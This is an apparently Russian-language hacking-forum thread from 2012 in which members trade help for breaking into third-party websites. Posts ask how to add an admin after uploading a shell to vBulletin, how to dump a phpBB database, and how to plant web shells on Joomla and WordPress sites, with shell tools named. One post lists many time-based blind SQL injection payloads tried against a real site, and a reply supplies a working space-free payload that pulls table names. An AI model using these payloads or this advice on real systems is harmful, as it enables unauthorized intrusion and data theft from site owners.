[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. shumaher

    shumaher New Member

    Joined:
    16 Feb 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Залил шелл в vBulletin® Version 4.2.0
    каким sql запросом добавить нового админа? хэш действующего сломать не осилил
     
    #401 shumaher, 27 Aug 2012
    Last edited: 27 Aug 2012
  2. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Есть админка на phpbb - как слить базу, что то ненайду?
     
  3. jkchief

    jkchief New Member

    Joined:
    6 Nov 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Всем привет, нашел скулю, но очень она странная.
    Помогите раскрутить...
    Ссылку прямую дать не могу

    Но может кто подскажет варианты, я хочу ее раскрутить:
    Итак детали : Есть некий сайт, скажем
    http://site.com
    Где по следующей ссылке акунетикс нашел скулю блинд скл инжекшн.
    http://site.com/misc/print_version.php
    Уязвимость касается POST параметра
    page was set to /rus/search.php'=sleep(2)='

    Полные пост данные:
    name=blah&page=/rus/search.php'=sleep(2)='
    SQLMAP ее не находит.


    Реакция сервера:
    1) sleep(2) - засыпает на 20 секунд. Чтобы заснул на 1 секунду, приходится ставить sleep(0.1) - почему так непонятно
    2) пробовал следующие варианты:

    Не засыпаетИли не засыпает на добавочный слип)
    page=blah'=sleep(0.2)='
    page='=sleep(0.2)='
    page=/rus/search.php'=sleep(0.1)= '
    page=/rus/search.php'=sleep(0.1)='" AND (BENCHMARK(100000,SHA1(CURRENT_USER)))
    page=/rus/search.php'=sleep(0.1)='" UNION SELECT (BENCHMARK(100000,SHA1(CURRENT_USER))) --
    page=/rus/search.php'=(BENCHMARK(100000,SHA1(CURRENT_USER))) =1"
    page=/rus/search.php'= (BENCHMARK(100000,SHA1(CURRENT_USER)))='
    page=/rus/search.php='=SLEEP(0.1)+(BENCHMARK(100000,SHA1(CUR RENT_USER)))='
    page=/rus/search.php'=sleep(0.1)=' AND WHERE (BENCHMARK(100000,SHA1(CURRENT_USER)))=1
    page=/rus/search.php'=(IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)), 1))='
    page=/rus/search.php'=sleep(0.1)='
    page=/rus/search.php'=A=sleep(0.1)='
    page=/rus/search.php'=sleep(sleep(0.1))='


    Засыпает, результат ожидаемый

    page=/rus/search.php='=(BENCHMARK(100000,SHA1(CURRENT_USER)) )='
    page=/rus/search.php'=(BENCHMARK(100000,SHA1(CURRENT_USER))) ='
    page=/rus/search.php'=sleep(0.1)='"
    page=/rus/search.php'='1'=sleep(0.1)='
    page=/rus/search.php'=sleep(0.1)='A'='
    page=/rus/search.php'=sleep(0.1)=sleep(0.1)='
    page=/rus/search.php'=sleep(sleep(0.1))='


    page=/rus/search.php'=(IF(SUBSTRING(USER(),1,4)='root',1,SLEEP(0.1)))='
    (пробелов в sleep нет, почемуто античатовский редактор сам его вставляет)

    Последний вариант конечно позволяет втавить проверку if, но вот вставить полноценный запрос типа select blah from balh не получается, так как если втавить пробел в любое место то слип не происходит.

    Вобщем поделитесь идеями хотябы, если не сложно как обойти
     
  4. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to jkchief
    Попробуйте так:
    Code:
    page=/rus/search.php'=(if(substring((select(table_name)from(information_schema.tables)where(table_schema!='information_schema')limit/**/0,1),1,1)='a',1,sleep(0.1)))='
     
  5. rzee

    rzee New Member

    Joined:
    8 Feb 2011
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Ребят подскажите, что творится? Проблема началась на одном сайте WP, стоит плагин уведомления об каких либо изменениях файлов на сервере. Стали приходить сообщения Changed:
    wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i
    Changed:
    /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/4d2fi
    Changed:
    wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/1786i

    В общем каждый день и по нескольку раз

    Пару жней назад такое же началось и на другом сайте... При просмотре, выдает набор цифр, как понимаю закодированно, пытался раскодировать, но выдает китайские символы... Вот несколько текстов, которые находятся по уведомляемым изменениям:

    Но при каждом уведомлении об изменении текст в файле другой. Что это и как бороться?
     
  6. persmash

    persmash New Member

    Joined:
    26 Apr 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Привет там,
    Есть кто-нибудь, кто знает, как использовать этот подвиг?
    http://3dwebdesign.org/forum/index.php?showtopic=1113
     
  7. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    95
    Likes Received:
    66
    Reputations:
    48
    Об этом можно забыть, просто очередной вебмастер который косит под "знающего".
    Я правда понятия не имею причем тут RFI он сказал, мне кажется он даже не знает что это. А фраза: "2. Hacker make POST requests to com_installer or com_templates" это люди просто пытались залить шелл через админку. Я уверен, что сайты его взломали через SQL одного из дырявых компонентов.
    Единственное, что он правильно написал как защитится от практически 95% взломов на Joomle.
     
    #407 FlooP1k, 11 Sep 2012
    Last edited: 11 Sep 2012
  8. persmash

    persmash New Member

    Joined:
    26 Apr 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Вы знаете, любой метод, чтобы взломать Joomla 1.5.26?
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Нужно слить все файлы сайта, wordpress. Шелл успешно залит, но с неочень хорошими правами, все заархивировать в один файл не получается (использую wso). мб есть какой нибудь шелл с функцией скачки файлов, чтоб не скачивать все по-одному?
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    PAS (ссыль на Rdot.org)

    Выделяешь папку - жмёшь Download - архивирует на лету
     
    _________________________
    1 person likes this.
  11. Itsdima

    Itsdima Banned

    Joined:
    20 Sep 2012
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Всем привет, как можно залить шелл на джумалу, кроме как через медиа менеджер и установку расширений ?
     
  12. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Версия? Папки доступные к заливу? И так далее...
     
  13. [anonimo]

    [anonimo] New Member

    Joined:
    12 Aug 2012
    Messages:
    56
    Likes Received:
    2
    Reputations:
    0
    Где найти уроки по Взлому сайта? не моя специфика, но почитать на досуге хочу, желательно чтобы было все понятно, до мелочей. Шеллы, и.т.п
     
  14. Itsdima

    Itsdima Banned

    Joined:
    20 Sep 2012
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Сайтов много, по разному.
     
  15. Reverser

    Reverser New Member

    Joined:
    13 Oct 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    вопрос по Joomla 1.5.26

    Помогите танкисту: имеется суперадминский доступ к админке (логин, пароль), но файл admin.login.php удалён. Как получить ftp доступ?
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Перечитай все что написано вот в этом топе:
    и по шелам давольно токи не плохой вот в этом топе:
     
    _________________________
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    У Joomla страница авторизации site.com/administrator/index.php
     
    _________________________
  18. Reverser

    Reverser New Member

    Joined:
    13 Oct 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Я ж и говорю, что всё было бы очень просто, если бы файл admin.login.php не был удалён. Т.е. сейчас нет никакой возможности попасть в админку: http://mephisto.com.ua/administrator/index.php = 404
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Может быть это ?

    Тыц
     
    _________________________
  20. bagbier

    bagbier New Member

    Joined:
    31 Mar 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Добрый день. Суть такова: нужно в учебных целях посмотреть уязвимости сайтов, сделанные с помощью cms, а я нубец. Подскажите пожалуйста пару атак, которые я смогу сделать на сайт, который будет у меня на денвере сделан с помощью joomla (2.5, но не принципиально). (ну то есть т.к. цели учебные, атаковать я буду себя) Думаю sql инъекция подойдет)
    И мб посоветуете для изучения уязвимостей какие-то другие цмски? Ну чтоб даже нуб смог провести атаку и понять ее суть, а еще лучше, чтобы в последствии от этой уязвимости избавиться)
     
    #420 bagbier, 19 Oct 2012
    Last edited: 19 Oct 2012